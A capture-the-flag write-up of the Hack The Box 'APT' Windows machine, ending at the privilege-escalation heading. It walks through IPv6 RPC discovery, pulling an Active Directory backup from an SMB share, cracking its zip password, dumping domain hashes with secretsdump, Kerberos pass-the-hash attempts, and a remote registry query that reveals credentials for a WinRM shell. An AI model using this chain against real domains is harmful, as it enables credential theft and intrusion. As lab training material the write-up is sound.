Links

HTB - APT

HTB - APT

Overview

Could not load image
Short description to include any strange things to be dealt with - Windows Insane

Useful Skills and Tools

Useful thing 1
  • description with generic example
Useful thing 2
  • description with generic example

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.213. The options I regularly use are: -p-, which is a shortcut which tells nmap to scan all ports, -sC is the equivalent to --script=default and runs a collection of nmap enumeration scripts against the target, -sV does a service scan, and -oA <name> saves all types of output (.nmap,.gnmap, and .xml) with filenames of <name>.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ nmap -sCV -n -p- -Pn -vvvv -oA apt 10.10.10.213
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap done: 1 IP address (1 host up) scanned in 132.93 seconds
Only two ports open, 80 - HTTP (IIS) and 135 - RPC

Port 80 - HTTP

found email [email protected], phone (818) 995-1560
<!-- Mirrored from 10.13.38.16/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:12:54 GMT -->
In source code saw IP mentioned 10.13.38.16/ also HTTrack Website Copier/3.x
Most of the pages on the site did not contain anything useful or interesting. The /support page had a contact form that I tried some XSS and SQLi
submitting the form redirected me to the IP I had seen that the site had been copied from (10.13.38.16). Burp also failed to connect
I also could not ping that IP. This was not the way.

Port 1135 - RPC

┌──(zweilos㉿kali)-[~/htb/apt]
└─$ rpcclient -I 10.10.10.213 -U "" -N apt.htb -p 135
Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED
I wasn't able to connect to the machine with RPC client. I seemed to have hit a dead end
searched for how to enumerate RPC without authentication
From a windows machine you could possibly use
#!/usr/bin/python
import sys, getopt
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter
def main(argv):
try:
opts, args = getopt.getopt(argv,"ht:",["target="])
except getopt.GetoptError:
print('IOXIDResolver.py -t <target>')
sys.exit(2)
target_ip = "10.10.10.213"
for opt, arg in opts:
if opt == '-h':
print('IOXIDResolver.py -t <target>')
sys.exit()
elif opt in ("-t", "--target"):
target_ip = arg
authLevel = RPC_C_AUTHN_LEVEL_NONE
stringBinding = r'ncacn_ip_tcp:%s' % target_ip
rpctransport = transport.DCERPCTransportFactory(stringBinding)
portmap = rpctransport.get_dce_rpc()
portmap.set_auth_level(authLevel)
portmap.connect()
objExporter = IObjectExporter(portmap)
bindings = objExporter.ServerAlive2()
print("[*] Retrieving network interface of " + target_ip)
#NetworkAddr = bindings[0]['aNetworkAddr']
for binding in bindings:
NetworkAddr = binding['aNetworkAddr']
print("Address: " + NetworkAddr)
if __name__ == "__main__":
main(sys.argv[1:])
I copied the PoC from the site and modified the script to scan the IP of my target.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ python3 IOXIDResolver.py 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::4d93:3f31:7ea4:6f57
After running it, I was presented with the hostname (I assume), the IPv4 address, and two IP46 addresses
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ ping -c 2 -6 dead:beef::b885:d62a:d679:573f 1 ⨯
PING dead:beef::b885:d62a:d679:573f(dead:beef::b885:d62a:d679:573f) 56 data bytes
64 bytes from dead:beef::b885:d62a:d679:573f: icmp_seq=1 ttl=63 time=68.4 ms
64 bytes from dead:beef::b885:d62a:d679:573f: icmp_seq=2 ttl=63 time=65.4 ms
--- dead:beef::b885:d62a:d679:573f ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1003ms
rtt min/avg/max/mdev = 65.438/66.913/68.389/1.475 ms
I was able to ping using the IP6 address. The TTL of 64 was a bit odd, not sure if that is normal for IPv6. It showed 127 like normal when pinging the IPv4 address.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ rpcclient -I dead:beef::b885:d62a:d679:573f -U "" -N apt.htb
rpcclient $>
Using this IPv6 address I was able to connect using rpcclient
rpcclient $> lsaquery
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
APT.HTB Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
After getting NT_STATUS_ACCESS_DENIED for all of my commands I was starting to think I wasn't going to get anything, but finnaly one command returned something. I got the hostname of APT.HTB
I went through a lot of the other commands, but wasn't able to get anything else out of this.

nmap - IPv6

this scan came up with a lot more open ports
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-03-29 01:18:57Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49679/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open msrpc syn-ack Microsoft Windows RPC
This time I was able to see many more ports open. This was looking like a real Windows server now
https://www.ethicalhackx.com/how-to-pwn-on-ipv6/ [dead:beef::b885:d62a:d679:573f]
I searched for a way to enumerate Windows using ipv6 and found a newer version of a popular tool, enum4linux, that supported ipv6
Using the information from this tool, I learned how to search using smbclient with ipv6
┌──(zweilos㉿kali)-[~/htb/apt/enum4linux-ng]
└─$ smbclient -t 5 -W htb -U % -L //dead:beef::b885:d62a:d679:573f 127 ⨯
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
dead:beef::b885:d62a:d679:573f is an IPv6 address -- no workgroup available
Was able to enumerate shares using smbclient. the backup share looked interesting
┌──(zweilos㉿kali)-[~/htb/apt/enum4linux-ng]
└─$ smbclient -t 5 -W htb -U % //dead:beef::b885:d62a:d679:573f/backup 1 ⨯
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Sep 24 03:30:52 2020
.. D 0 Thu Sep 24 03:30:52 2020
backup.zip A 10650961 Thu Sep 24 03:30:32 2020
10357247 blocks of size 4096. 6963935 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (5794.6 KiloBytes/sec) (average 5794.6 KiloBytes/sec)
Inside the backup share I found a backup.zip and extracted it to my computer
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
skipping: Active Directory/ntds.dit incorrect password
skipping: Active Directory/ntds.jfm incorrect password
creating: registry/
skipping: registry/SECURITY incorrect password
skipping: registry/SYSTEM incorrect password
The zip file was password-protected, but not encrypted. This was a very juicy find, indeed. If I could extract these files, I could potentially get the password hashes of all of the domain users on this machine
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ zip2john backup.zip > backup.hash
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
next I used zip2john to extract the password hash
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-03-29 21:06) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Then I loaded the hash into John. It cracked in less than a second. The password was iloveyousomuch
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ unzip backup.zip
Archive: backup.zip
[backup.zip] Active Directory/ntds.dit password:
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
inflating: registry/SECURITY
inflating: registry/SYSTEM
Using this password I was able to successfully extract all of the files
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ secretsdump.py -ntds 'Active Directory/ntds.dit' -system registry/SYSTEM -security registry/SECURITY LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:34005b00250066006f0027007a004700600026004200680052003300630050005b002900550032004e00560053005c004c00450059004f002f0026005e0029003c00390078006a0036002500230039005c005c003f0075004a0034005900500062006000440052004b00220020004900450053003200660058004b00220066002c005800280051006c002a0066006700300052006600520071003d0021002c004200650041005600460074005e0045005600520052002d004c0029005600610054006a0076002f005100470039003d006f003b004700400067003e005600610062002d00550059006300200059006400
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb
[*] DefaultPassword
(Unknown User):Password123!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3e0d78cb8f3ed66196584c44b5701501789fc102
dpapi_userkey:0xdcde3fc585c430a72221a48691fb202218248d46
[*] NL$KM
0000 73 4F 34 1D 09 C8 F9 32 23 B9 25 0B DF E2 DC 58 sO4....2#.%....X
0010 44 41 F2 E0 C0 93 CF AD 2F 2E EB 13 81 77 4B 42 DA....../....wKB
0020 C2 E0 6D DE 90 79 44 42 F4 C2 AD 4D 7E 3C 6F B2 ..m..yDB...M~<o.
0030 39 CE 99 95 66 8E AF 7F 1C E0 F6 41 3A 25 DA A8 9...f......A:%..
NL$KM:734f341d09c8f93223b9250bdfe2dc584441f2e0c093cfad2f2eeb1381774b42c2e06dde90794442f4c2ad4d7e3c6fb239ce9995668eaf7f1ce0f6413a25daa8
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
...snipped 1000s of random users...
[*] ClearText password from Active Directory/ntds.dit
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;[email protected]>Vab-UYc Yd
[*] Cleaning up...
There were hundreds of users on this domain! Luckily there were a couple of plaintext passwords
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ awk -F ":" '{print $1}' ntds.dump > users
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ wc -l users
7996 users
I was wrong...there were almost 8000 users!!
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ awk -F ":" '{print $1}' ntds.dump | grep -v "[*]" | sort | uniq > users
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ wc -l users
2004 users
After looking in it a bit, I noticed there were duplicates. After sorting and pulling out the unique entries there were only...2000 or so left. Much more manageable, but a lot to go through still.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ kerbrute_linux_amd64 userenum --dc apt.htb.local -d htb users 1 ⨯
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/29/21 - Ronnie Flathers @ropnop
2021/03/29 21:53:14 > Using KDC(s):
2021/03/29 21:53:14 > apt.htb.local:88
2021/03/29 21:53:24 > [+] VALID USERNAME: [email protected]
2021/03/29 21:54:26 > [+] VALID USERNAME: [email protected]
2021/03/29 22:00:35 > [+] VALID USERNAME: [email protected]
2021/03/29 22:12:34 > Done! Tested 2004 usernames (3 valid) in 1159.740 seconds
Using kerbrute I was able to find 3 valid users out of 2000+
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ awk -F":" '{print $3,$4}' ntds.dump | sed 's/ /:/g' > nt_hashes
Now I needed to find a valid hash. I put all of the hashes in a file by themselves
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ crackmapexec smb apt.htb.local -u henry.vinson -H nt_hashes -d htb
I tried using crackmapexec but it did not come up with any results (not sure if it even did anything...)
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:297f523d69d61de58b690f158f052c1d -dc-ip apt.htb.local htb/henry.vinson
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
Using GetTGT.py from impacket I was able to check one hash, but there was no way to validate all of the hashes at one time
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(cat nt_hashes);do getTGT.py -hashes x -dc-ip apt.htb.local htb/henry.vinson 2>/dev/null;done
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
not enough values to unpack (expected 2, got 1)
I used some bash magic to run the same command for each line in my nt_hashes file. It started giving a bunch of errors for all of the lines that didn't have both halves of the hash (this script from Impacket expects both halves)
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(cat test);do getTGT.py -hashes $x -dc-ip apt.htb.local htb/henry.vinson;done
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I pulled out one of the hashes and tried it with just one that was in the right format, but this time I got an error that said my clock was too far off the DC
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>
I had to install ntpdate
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ sudo ntpdate apt.htb.local 1 ⨯
29 Mar 23:07:02 ntpdate[794852]: no server suitable for synchronization found
After playing with my system time, I realized that it never jumped forwards for daylight savings time...
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ sudo ntpdate pool.ntp.org 1 ⨯
29 Mar 23:14:48 ntpdate[842178]: step time server 194.36.144.87 offset -3599.289748 sec
I simply synced it with a known good ntp server (Note: I realised that I had to change my system clock for another HTB machine in the past (find name and link) so this was just reverting it...)
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ date
Tue 30 Mar 2021 12:17:39 AM EDT
I still had the same problem... my VM reported one time, but the terminal reported another... the date command was way off for some reason
The next day, it was magicly working. I didn't restart the system or anything (I had actually only paused the vm)
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(cat nt_hashes);do getTGT.py -hashes $x -dc-ip apt.htb.local htb/henry.vinson 2>/dev/null;done
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
This time I was able to enumerate the users (or at least was able to connect and get the PREAUTH_FAILED error).
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(cat nt_hashes);do getTGT.py -hashes $x -dc-ip apt.htb.local htb/henry.vinson | grep -v Impacket | grep -v "KDC_ERR_PREAUTH_FAILED" | tee -a valid_hash && echo $x >> valid_hash;done
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I used a bit of bash hackery to remove the results that showed failed attempts and let it run. (I assumed it would take a long time so I let it go and got dinner)
this is the way
I had to enable ssh on my machine, then do port forwarding.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ crackmapexec smb -d htb henry.vinson localhost
SMB ::1 445 APT [*] Windows Server 2016 Standard 14393 (name:APT) (domain:htb) (signing:True) (SMBv1:True)
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ crackmapexec smb -d htb henry.vinson -H aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb localhost
this is not the way
but other than getting the windows version information, I could not get this to connect afterwards
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ crackmapexec --verbose smb -d htb henry.vinson localhost
DEBUG Passed args:
{'aesKey': None,
'amsi_bypass': None,
'clear_obfscripts': False,
'content': False,
'continue_on_success': False,
'cred_id': [],
'darrell': False,
'depth': None,
'disks': False,
'domain': 'htb',
'exclude_dirs': '',
'exec_method': None,
'execute': None,
'fail_limit': None,
'force_ps32': False,
'gen_relay_list': None,
'get_file': None,
'gfail_limit': None,
'groups': None,
'hash': [],
'jitter': None,
'kdcHost': None,
'kerberos': False,
'list_modules': False,
'local_auth': False,
'local_groups': None,
'loggedon_users': False,
'lsa': False,
'module': None,
'module_options': [],
'no_bruteforce': False,
'no_output': False,
'ntds': None,
'obfs': False,
'only_files': False,
'pass_pol': False,
'password': [],
'pattern': None,
'port': 445,
'protocol': 'smb',
'ps_execute': None,
'put_file': None,
'regex': None,
'rid_brute': None,
'sam': False,
'server': 'https',
'server_host': '0.0.0.0',
'server_port': None,
'sessions': False,
'share': 'C$',
'shares': False,
'show_module_options': False,
'smb_server_port': 445,
'spider': None,
'spider_folder': '.',
'target': ['henry.vinson', 'localhost'],
'threads': 100,
'timeout': None,
'ufail_limit': None,
'username': [],
'users': None,
'verbose': True,
'wmi': None,
'wmi_namespace': 'root\\cimv2'}
DEBUG Using selector: EpollSelector
DEBUG Running
DEBUG Started thread poller
DEBUG Error resolving hostname henry.vinson: [Errno -2] Name or service not known
DEBUG Error retrieving os arch of ::1: Could not connect: [Errno 111] Connection refused
SMB ::1 445 APT [*] Windows Server 2016 Standard 14393 (name:APT) (domain:htb) (signing:True) (SMBv1:True)
DEBUG Stopped thread poller
If someone could tell me what I was doing wrong I would greatly appreciate it!!

getTGT way (cont)

STill got time sync error, but this time only for one hash; all others reported PREAUTH error
┌──(zweilos㉿kali)-[~/htb/apt]
└─$cat valid_hash
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
couldn't resolve time sync errors...
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ export [email protected]
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ net time -S apt.htb.local
Tue Mar 30 21:38:19 2021
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ date
Tue 30 Mar 2021 09:28:35 PM EDT
my errors were caused because the time was 10 minutes off...Thank you net time!!
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(head -1 test);do getTGT.py -hashes $x -dc-ip apt.htb.local htb/[email protected] | grep -v Impacket | tee -a valid_hash3 && echo $x >> valid_hash3 ;done
[*] Saving ticket in [email protected]
And it worked!!

push on

┌──(zweilos㉿kali)-[~/htb/apt]
└─$ psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on apt.htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
The hash seemed to be valid! I got a listing of shares, though it wouldnt connect since they werent writeable
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb htb/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
denied using wmiexec.py
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb htb/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
I was starting to think that the hash was not valid, though it did enumerate shares...
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb htb/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
I kept going down the list of impacket tools that were relevant
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ python3 /usr/local/bin/reg.py -dc-ip apt.htb.local -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb apt.htb.local query -keyName HKCU -s
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
nothing seemed to work. I tried each of these using the -k option after exporting the key to KRB5CCNAME and still couldnt progress
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ klist
Ticket cache: FILE:[email protected]
Default principal: [email protected]
Valid starting Expires Service principal
03/30/2021 21:54:04 03/31/2021 07:54:04 krbtgt/[email protected]
renew until 03/31/2021 21:52:51
So the ticket was expired.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ for x in $(cat test);do getTGT.py -hashes $x -dc-ip apt.htb.local htb.local/[email protected] | grep -v Impacket | tee -a valid_hash;done
[*] Saving ticket in [email protected]
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ klist
Ticket cache: FILE:[email protected]
Default principal: [email protected]
Valid starting Expires Service principal
03/31/2021 20:18:19 04/01/2021 06:18:19 krbtgt/[email protected]
renew until 04/01/2021 20:15:12
I ran my one-liner from earlier (on just the valid hash!) and the time was refreshed
I tried dumping the registry, and this time it took much, much, longer to output (like everything else on this machine so far!). I was sure that it was working this time!! I used the -s reg option to make it recursively get all keys. I chose HKEY-USER first since it was a likely place to find potential credentials and other useful system information.
Each registry key located under the HKEY_USERS hive corresponds to a user on the system and is named with that user's security identifier, or SID. The registry keys and registry values located under each SID control settings specific to that user, like mapped drives, installed printers, environment variables, desktop background, and much more, and is loaded when the user first logs on.
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ python3 /home/zweilos/.local/bin/reg.py -k apt.htb.local query -keyName HKLM -s | tee regdump_HKLM
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Next I tried to download HKLM while I perused through HKU, but I was denied access.
\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchPlatform\Preferences\
BreadCrumbBarSearchDefault REG_SZ MSNSearch
DisableAutoNavigateURL REG_DWORD 0x0
DisableAutoResolveEmailAddrs REG_DWORD 0x0
DisableResultsInNewWindow REG_DWORD 0x0
DisableTabbedBrowsing REG_DWORD 0x0
EditSavedSearch REG_DWORD 0x0
IEAddressBarSearchDefault REG_SZ MSNSearch
Apparently this user never uses this machine, since their default search was MSN...There surprisingly was actually not that much information in this registry dump
\Software\Microsoft\Windows\CurrentVersion\Group Policy\GroupMembership\
Group0 REG_SZ S-1-5-21-2993095098-2100462451-206186470-513
Group1 REG_SZ S-1-1-0
Group2 REG_SZ S-1-5-32-545
Group3 REG_SZ S-1-5-32-554
Group4 REG_SZ S-1-5-4
Group5 REG_SZ S-1-2-1
Group6 REG_SZ S-1-5-11
Group7 REG_SZ S-1-5-15
Group8 REG_SZ S-1-2-0
Group9 REG_SZ S-1-18-1
Group10 REG_SZ S-1-16-8192
Count REG_DWORD 0xb
The group policy key gave a listing of the groups that this user was a part of. I could use this to look up the well known groups by their SID.
\Volatile Environment\
LOGONSERVER REG_SZ \\APT
USERDNSDOMAIN REG_SZ HTB.LOCAL
USERDOMAIN REG_SZ HTB
USERNAME REG_SZ henry.vinson
USERPROFILE REG_SZ C:\Users\henry.vinson
HOMEPATH REG_SZ \Users\henry.vinson
HOMEDRIVE REG_SZ C:
APPDATA REG_SZ C:\Users\henry.vinson\AppData\Roaming
LOCALAPPDATA REG_SZ C:\Users\henry.vinson\AppData\Local
USERDOMAIN_ROAMINGPROFILE REG_SZ HTB
\Volatile Environment\1\
SESSIONNAME REG_SZ Console
CLIENTNAME REG_SZ
I reached the end of the file and found some minorly useful information. I started doing some searches to see if I missed something

Finding user creds

\Software\GiganticHostingManagementSystem\
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#[email protected]
Searching for Password yeilded something that I had scrolled right past in my first look through. There was a username and password henry.vinson_adm:G1#[email protected]

Initial Foothold

┌──(zweilos㉿kali)-[~/htb/apt]
└─$ evil-winrm -u henry.vinson_adm -p G1#[email protected] -i apt.htb.local 1 ⨯
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== =============================================
htb\henry.vinson_adm S-1-5-21-2993095098-2100462451-206186470-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
After all that, I finally had a shell! There were no useful or interesting groups or privileges (adding a machine to the domain would be very useful in other situations though! I should have tried it anyway...).

User.txt

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents> cd ../Desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Desktop> ls
Directory: C:\Users\henry.vinson_adm\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/31/2021 3:46 PM 34 user.txt
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Desktop> type user.txt
0be8b33241a64934480a8ff868aca6ca
I found the proof that I had made it inside, on the users Desktop

Path to Power (Gaining Administrator Access)

Enumeration as henry.vinson_adm

